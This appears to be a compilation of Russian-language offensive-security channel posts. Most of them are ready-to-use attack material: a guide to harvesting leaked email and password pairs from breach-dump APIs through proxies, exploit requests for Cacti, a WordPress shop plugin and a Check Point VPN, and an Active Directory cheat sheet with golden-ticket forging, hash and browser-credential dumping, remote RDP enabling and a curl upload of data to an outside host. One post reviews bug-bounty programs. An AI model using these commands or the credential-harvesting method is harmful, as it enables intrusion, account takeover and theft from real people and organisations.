CVE-2024-21111

Повышение привилегий до SYSTEM с помощью VirtualBox. Эксплуатация Arbitrary File Write/Delete с помощью симлинков, \RPC Control\, в связке с DLL Hijacking.

Ресерч: https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/

Вот бывает, что хочешь поставить на сервак sqlmap и быстро вытащить через какой-нибудь boolean-based данные. А в sqlmap это сраное ограничение на 10 потоков, хотя сайт может все 100.

Короч, идешь на
/usr/share/sqlmap/lib/core/settings.py

Ищешь строку

# Maximum number of threads (avoiding connection issues and/or DoS)
MAX_NUMBER_OF_THREADS = 10

Меняешь на 1000

И теперь никто тебе не указ, аргументом вида sqlmap --threads 40 ставишь потоков сколько нужно.

>

The Kubenomicon

Матрица угроз в стиле MITRE ATTACK для Kubernetes, ориентированная на наступательную безопасность. С акцентом на то, как использовать каждую атаку.

1. Initial access
— Using cloud credentials
— Compromised image In registry
— Kubeconfig file
— Application vulnerability
— Exposed sensitive interfaces
— SSH server running inside container

2. Execution
— Exec inside container
— New container
— Application exploit (RCE)
— Sidecar injection

3. Persistence
— Backdoor container
— Writable hostPath mount
— Kubernetes cronjob
— Malicious admission controller
— Container service account
— Static pods

4. Privilege escalation
— Privileged container
— Cluster-admin binding
— hostPath mount
— Access cloud resources

5. Defense evasion
— Clear container logs
— Delete events
— Pod name similarity
— Connect from proxy server

6. Credential access
— List K8S secrets
— Access node information
— Container service account
— Application credentials in configuration files
— Access managed identity credentials
— Malicious admission controller

7. Discovery
— Access Kubernetes API server
— Access Kubelet API
— Network mapping
— Exposed sensitive interfaces
— Instance Metadata API

8. Lateral movement
— Access cloud resources
— Container service account
— Cluster internal networking
— Application credentials in configuration files
— Writable hostPath mount
— CoreDNS poisoning
— ARP poisoning and IP spoofing

9. Collection
— Images from a private registry
— Collecting data from pod

Собираем пароли к мылам. Существуют сервисы, которые хранят дампы с удаленных источников по типу BreachForums, cit0day. Вот примерный список таких:
https://www.saashub.com/snusbase-alternatives
Возьмем для примера Snusbase.
https://beta.snusbase.com/v2/combo/[email protected]
Отправляем email и получаем в json формате email и password. Некоторые будут в захэшированном виде. Но т.к это бесплатный API, то нам не дадут с 1 устройства делать множество запросов. Можно открыть документацию API почитать. Т.к мы получаем ответ в body, то можем сделать простой парсер с прокси.

Использовать будем 5 потоков, чтобы не прилетал бан, особенно, если пулл прокси небольшой. Та и это всего-лишь пример. Может вы будете использовать менее распространенный ресурс, если переборщить с потоками, то можно его просто положить. Также используйте опцию "Check content". Если ваш запрос не пройдет, то будет перечек с другой проксей.
https://a-parser.com/docs/parsers/net-http

В результате у нас будет JSON файл с которого надо выдернуть email:pass. Используем простой скрипт на python

import re
import json

# Открываем файл file.json для чтения
with open('file.json', 'r') as file:
    data = file.read()

# Находим все соответствия вашему regex-шаблону в файле
matches = re.findall(r'"username":"([^"]*)","password":"([^"]*)"', data)

# Выводим пары username-password в формате "Username:Password"
for match in matches:
    print(f"{match[0]}:{match[1]}")

В результате получим email:pass и email:hash, останется удалить дубликаты и можно пользоваться👍🏻
Таким же методом можно обращаться к API других сервисов и собирать собственный словарь поддоменов, страничек и т.д

#pentest #web

Привет, это Зёма. Я вернулся. Снова.
Прошло уже больше 2 лет с великого пидо прогона граждан РФ с зарубежных площадок. В октябре 2022 года я делал пост, который касался багхантинга в новом мире. Пришло время актуализировать информацию. К сожалению (или к счастью для меня), в этот раз не будет разделения на возраст, необходимый для участия.

Начнём с площадок:
- Standoff365 - сделали крупные шаги и сделали багхантинг доступным всем! Добавили фильтры, которые позволяют отобрать программы разным группам хакерам (несовершеннолетним или гражданам не РФ);
- Bi.Zone - прикольные рейтинги, а также у них есть программы, которых нет на других платформах (например, Astra Linux);
- Bugbounty.ru - ну это ббру, ничего особо не изменилось, только добавились программы.

В это году VK в честь десятилетия программы баг баунти сделали Bug Bounty Pass. Советую принять участие.

Hackenproof ограничили доступ для РФ. Что по итогу с ними - неизвестно. Да и участие в бб у них на площадке может нести риски для граждан РФ. Не советую.


А теперь про Self-hosted программы. За это время я попробовал множество программ и хотел бы поделиться некоторыми из них, а также фидбеком.

- CardPR - отвечают быстро, платят щедро. Довольно интересные правила программы бб, но у них есть свои плюсы;
- Пешкарики - долго отвечают, выплаты относительно неплохие, есть что поискать. Было такое, что выплату разбили на 2 части, даже не предупредив об этом;
- AvanChange - платят нормально, ответы довольно быстрые, есть что покапать. Особенно подойдёт тем, кто любит поковыряться с различными криптовалютными обменниками;
- in.top - выплаты небольшие, но есть чего покапать, отвечают быстро;
- Aeza - самая противоречивая программа. Кажется, что платят нормально, но приходилось доказывать, что для эксплуатации XSS не нужно убеждать пользователя разрешить выполнение JS (если это не отключено по умолчанию);
- FunPay - с них, можно сказать, начался мой путь в бб. Приятные выплаты, накидывают соточку даже за опечатки. Ответы относительно быстрые, с Михаилом довольно приятно общаться, крутой мужик!;
- Пачка - одна из самых приятных программ. Выплаты средние, но всегда готовы обсудить баги. 1 раз выплатили за багу, про которую им было известно, но я нашёл как её можно крутануть дальше;
- Pyrus - есть что поискать. Пост про найденную у них багу уже был на канале в начале этого года. Выплату получал полгода (частично моя вина, т.к. отложил до своего совершеннолетия, но и после этого потребовалось 2 месяца, чтобы денежка до меня дошла).

Ещё есть Яндекс, они часто проводят конкурсы с большими иксами, но как-то не участвовал.

Также остаются прежние рекомендации:
- Стоит самостоятельно искать бб программы при помощи дорок поисковых систем. Почти все сайты из списка выше были найдены таким образом;
- Перед тем, как убить всё свободное время, стоит закинуть пару простых багов, чтобы оценить стоит ли программа того;
- Не всегда те, кто готовы платить за уязвимости, публично заявляют об этом;
- И, наконец, try harder!

Небольшое уточнение. Выплаты оценивал чисто для себя (обычного студента, который не шикует, а просто живёт в общаге в Питере).

Критику и дополнения как всегда готов принять в комментариях. Возможно это повлияет на следующий пост, который когда-нибудь выйдет.

Записки Зёмы

Порты и их соответствия с сервисами
Общие:135,137,139,445,8080,80,443
Nas synology port: 5000,5001 - Хранилище данных
Veeam: 9443,9392,9393,9401,6160 - Бекапы
DB mysql,mssql,db2,postgresql: 3306,1433,50000,5432,5433 - Базы
данных
Veritas backup exec. 6101,10000,3527,6106,1125,1434,6102 server
3527,6106 - Бекапы
Oracle: 1521,1522
Remote control: 22,21,3389 4899,5900 - Возможность альтернативного
подключения к компу
Nfs: 111,1039,1047,1048,2049
Iscsi: 860,3260
replication: 902,31031,8123,8043,5480,5722
Sophos Web: 4444
Sophos Console: 2195,8190,8191,8192,8193,8194,49152-65535
#pentest

Linksys routers POCs
*
CVE-2024-33788 - POC exploit
CVE-2024-33789 - POC exploit

Сдаем экзамен по Sliver C2 framework с легкостью бабочки ))
*
Lets go


#sliver

💡 Если в ходе багбаунти/пентеста вы встретили веб-приложение на Symfony, проверьте наличие дебаг режима (/app_dev.php) и возможности чтения конфига: /app_dev.php/_profiler/open?file=app/config/parameters.yml

#tips #bugbounty #pentest

CVE-2024-29895 cacti
*
Command injection in cmd_realtime.php
*
fofa link
*
usage:
https://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1

#net

CVE-2024-33551
Уязвимость SQL inj, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress.
Уязвимость позволяет команды SQL в базе данных.
*
POC
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1

#wordpress #sql

Cheat Sheets Active Directory by @knightpentest & h4ckerVasya228
Golden ticket

proxychains -q -f /etc/prox.conf impacket-ticketer -nthash c52768f4166e464cd2ecdd4352e189f1 -domain-sid S-1-6-22-3732769435-1556326674-770229386-500 -domain knightpentest.local krb

Get Active Directory users

proxychains -q -f proxychains.conf impacket-GetADUsers -all -dc-ip 127.0.01 'knightpentest.local/hackervasya:l0veyou' | tee -a usersAD.txt

LDAPDomainDump https://github.com/dirkjanm/ldapdomaindump собрать инфу о компах, юзерах, политике паролей и т.д

proxychains -q -f proxychains.conf ldapdomaindump -u 'knightpentest.local\hackervasya' -p 'l0veyou' 127.0.0.1 -o ldapenum

Extract only NTDS.DIT data (NTLM hashes and Kerberos keys) more info: https://kb.offsec.nl/tools/framework/impacket/secretsdump-py/

proxychains -q -f /etc/proxychains.conf python3 secretsdump.py <DOMAIN>/<USER>:"<PASSWORD>"@<IP-DOMAIN-CONTROLLER> -dc-ip <IP-DOMAIN-CONTROLLER> -just-dc -o dump.txt

dump browser credentials

for x in $(cat smbs.txt); do proxychains -q -f proxychains.conf dploot browser -d knightpentest.local -u student -p 'L9vvv' -pvk key.pvk $x;done >> browser.txt

dump the backup key

dploot backupkey -d knightpentest.local -u student -p 'qwerty221' 127.0.0.1

internal scanner fscan

fscan.exe -h 192.168.1.1/24

Conveniently upload and download data.

echo a > a.txt curl -T a.txt bashupload.com

connect to host

proxychains -q -f proxychains.conf evil-winrm -i 192.168.0.0 -u 'knightpentest.local\student' -p 'Louis123'

check share

proxychains -q -f proxychains.conf smbmap -H 192.168.0.0 -u student -p 'Lvvvv34' -d 'knightpentest.local'

proxychains -q -f proxychains.conf smbmap -H 192.168.0.0 -u student -p 'Lvvvv34' -d 'knightpentest.local' -r 'D$'

proxychains -q -f proxychains.conf nxc smb 192.168.0.0 -u 'student' -p 'Lvvvv34' --shares

proxychains -q -f proxychains.conf nxc smb smbs.txt -u 'student' -p 'Lvvvv34' -M spider

Get process

proxychains -q -f proxychains.conf nxc smb 127.0.0.1 -u 'student' -p 'Lvvvv34' -x 'powershell /c "Get-WmiObject win32_process | Format-List ProcessId, CommandLine"'

rdp connect

proxychains -q -f proxychains4.conf xfreerdp /u:student /p:'Lvvvv34' /d:knightpentest.local /v:127.0.0.1 /cert-ignore

rdp on

proxychains -q -f proxychains.conf nxc smb 127.0.0.1 -u 'student' -p 'Lvvvv34' -d 'knightpentest.local' -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

Get-PSDrive

proxychains -q -f proxychains.conf nxc smb 192.168.0.0 -u 'student' -p 'Lvvvv34' -d 'knightpentest.local' -x 'powershell get-psdrive'

current user sessions

proxychains -q -f proxychains.conf nxc smb 192.168.0.0 -u 'student' -p 'Lvvvv34' -d 'knightpentest.local' -x 'quser'

Dump Veeam

proxychains -q -f proxychains.conf nxc smb 192.168.0.0 -u 'student' -p 'Lvvvv34' -M veeam

Viewing shared resources

net view \\KNIGHT\

🌈—KnightPentest—🌈
#activedirectory #pentest #windows

CVE-2024-32002 GIT RCE
*
Удаленного выполнения кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit

#git #rce

CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#0day #checkpoint